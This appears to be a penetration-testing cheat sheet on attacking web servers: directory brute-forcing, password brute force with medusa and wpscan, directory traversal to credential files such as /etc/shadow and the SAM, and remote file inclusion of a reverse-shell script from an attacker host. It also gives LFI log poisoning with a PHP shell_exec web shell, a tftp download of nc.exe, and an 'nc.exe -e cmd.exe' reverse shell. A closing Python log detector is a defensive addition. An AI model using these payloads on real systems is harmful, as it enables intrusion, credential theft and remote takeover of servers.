Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these; look for any open HTTP service on other ports
…a web server exposes multiple attack vectors (directory traversal, RFI, LFI, SQL injection), covered below


dirb http://10.10.1.299
dirb http://10.10.1.299 -P 10.10.1.299:8080 -o file.txt   # USED TO SCAN OTHER PORTS
dirbuster                                                  # GUI USED TO ENUMERATE
gobuster dir -u http://10.10.1.299:8080 -w wordlist.txt

# TAKES A WHILE (220K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# QUICKER (87K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
# QUICKEST (5K words)
/usr/share/wordlists/dirb/common.txt

medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin

# ATTACK VECTORS TO CHECK (each covered in its own section below)
DIRECTORY TRAVERSAL
REMOTE FILE INCLUSION
LOCAL FILE INCLUSION
SQL INJECTION

# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password

DIRECTORY TRAVERSAL

…you may be able to view files on the server
…you’ll traverse file paths using “../../../” to go backward
…then list the location of the file you are trying to read


https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

…you can look for very common files on a system

WINDOWS
C:\windows\win.ini
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab

REMOTE FILE INCLUSION (RFI)

… you may be able to reference a file on your own server via the web request
… look for a page or file request (?page=)
… URL encoding may be done through BurpSuite Decoder


http://10.10.1.299/section.php?page=http://192.168.119.299:443/revshell.php

# EXAMPLE USING ACS WITH ESCAPE (NULL BYTE %00) PADDING AT THE END
http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http%3A%2F%2F192.168.119.188%3A443%2Fshell.php%00

# EXAMPLE USING CURL
curl -s --data "<?system('$CMD');?>" 'http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00'

LOCAL FILE INCLUSION (LFI)

… if you can poison a file on the server (e.g. a log file) with PHP code, you may be able to include and execute it
… sometimes this works after discovering Directory Traversal
… URL encoding may be done through BurpSuite Decoder


# DIRECTORY TRAVERSAL WORKED
?file=../../../../../../../var/log/httpd/access_log
# SO LFI MAY WORK BY POISONING THE LOG FILES
?file=data:text/plain,<?php echo shell_exec("dir") ?>
?helpfile=../secret/.htpasswd
?download=brochure.pdf
?download=../include/connection.php
# URL ENCODE THROUGH BURPSUITE DECODER
?file=data:text/plain,%3C?php%20echo%20shell_exec(%22id%22)%20?%3E

# MORE LOG POISONING TECHNIQUES
# COMMON PADDING (NULL BYTE TO CUT OFF AN APPENDED EXTENSION)
param=../../../../../../etc/passwd%00

# Default Locations
# RHEL / Red Hat / CentOS / Fedora Linux Apache log file location
/var/log/httpd/access_log
/var/log/httpd/error_log
# Debian / Ubuntu Linux Apache log file location
/var/log/apache2/access.log
/var/log/apache2/error.log
# FreeBSD Apache log file location
/var/log/httpd-access.log
/var/log/httpd-error.log
# For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files:
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf

# Windows web roots
C:/xampp/htdocs/
C:/wamp/www/
C:/Inetpub/wwwroot/

# CONNECT AND POISON (the PHP tag is written into the access log via the raw request)
$ nc 192.168.1.23 80
<?php echo shell_exec($_GET['cmd']);?>
# USE LANG ATTRIBUTE TO ACCESS LOG
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00
# UPLOAD NETCAT WITH TFTP
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=tftp+-i+10.10.10.299+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00
# EXECUTE NETCAT
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=nc.exe+10.10.10.299+80+-e+cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00
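The traversal, null-byte padding, PHP wrapper, remote-include and log-poisoning request shapes listed in the three sections above all leave a recognisable trace in the Apache access log. The following detector is an added example for the defending side, not part of the original notes: it parses combined-format log lines (constructed sample data, not real traffic), URL-decodes the request target and flags each of those patterns. Rule names and the sample IPs are assumptions chosen for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Apache combined format (not real traffic).
# Line 6 carries a harmless PHP tag in the User-Agent, the shape a log-poisoning attempt leaves.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /loadImage?filename=..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 92 "-" "curl/8.0"
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /vuln.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1840 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /section.php?page=http://203.0.113.9:443/revshell.php HTTP/1.1" 500 0 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "POST /admin.php?ACS_path=php://input%00 HTTP/1.1" 200 10 "-" "curl/8.0"
10.0.0.8 - - [01/Jan/2024:10:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php phpinfo(); ?>"
"""

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One rule per technique from the cheat sheet; applied to the decoded target, referer and user-agent.
RULES = {
    "traversal":      re.compile(r"\.\./|\.\.\\"),                 # ../ or ..\ (Windows variant)
    "null_byte":      re.compile(r"\x00"),                         # %00 padding after decoding
    "php_wrapper":    re.compile(r"php://|data:|expect://", re.I), # php://input, data:text/plain,...
    "remote_include": re.compile(r"[?&][^=&]+=https?://", re.I),   # ?page=http://attacker/...
    "php_tag":        re.compile(r"<\?php|<\?=", re.I),            # PHP code planted for log poisoning
}

def classify_line(line):
    """Return {'ip', 'target', 'hits'} for a parsable log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(unquote(m["target"]))  # decode twice so double-encoded payloads are caught too
    fields = (decoded, m["ref"], m["ua"])
    hits = sorted({name for name, rx in RULES.items() if any(rx.search(f) for f in fields)})
    return {"ip": m["ip"], "target": m["target"], "hits": hits}

def scan_log(text):
    """Return only the lines that triggered at least one rule, in log order."""
    results = (classify_line(l) for l in text.splitlines())
    return [r for r in results if r and r["hits"]]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(f"{r['ip']:<10} {', '.join(r['hits']):<24} {r['target']}")
```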

RESTART WINDOWS


shutdown /r /t 0
